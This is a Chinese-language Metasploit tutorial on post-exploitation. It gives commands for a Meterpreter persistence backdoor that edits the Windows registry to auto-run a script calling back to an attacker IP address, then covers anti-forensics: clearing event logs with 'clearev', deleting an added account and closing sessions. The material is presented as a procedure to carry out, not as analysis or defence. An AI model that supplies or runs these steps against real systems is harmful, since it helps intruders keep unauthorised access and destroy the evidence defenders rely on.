目录
一、权限维持创建后门
1.1、概述:
获取目标系统的访问权限后,如果目标用户破坏了该连接(重启),所以需要在此之前,创建一个后门来恢复与目标主机的连接,而无需再进入目标系统。,此时使用后门将允许自动重新与目标系统建立连接。
1.2、过程:
激活Meterpreter会话
sessions -i 2
查看帮助命令
run persistence -h
结合不同的选项,创建一个持久后门
run persistence -U -A -i 10 - 8090 -r 192.168.190.149
输出的信息显示创建后门过程,在目标系统中创建了一个持久脚本(保存在C:\DOCUME~l\Test\LOCALS~I\Temp\lzXBdJvcpnD.vbs)并篡改注册表,该脚本会自动在目标主机上运行, 并将会建立第二个Meterpreter会话。
验证后门
关闭攻击会话,并重启目标机
监听目标,重启后能上线获得攻击会话
注
就算远控木马文件payload.exe被清除,但后门还在
如果后门脚本、注册表注册项清除,将无法再控制
二、清除痕迹
(如果提示:stdapi_sys_eventlog_clear:操作失败:访问被拒绝)
(操作前都是需要提权的,如getsystem提取,或者查看补丁信息后提权)
2.1、第一步:日志
为了不暴露攻击者的痕迹行为,需要清除系统事件
打开 Windows 事件查看器(可以看到日志信息)
直接在控制面板搜
2.2、第二步:清理额外信息
删除添加的账号
net user 添加的用户名 /del
退出目标服务器的shell
exit 或者 logoff
删除日志
clearev
2.3、第三步:MSF清理
退出meterpreter shell
exit
查看所有的MSF连接
sessions
关闭所有的MSF链接(或指定的)
sessions -K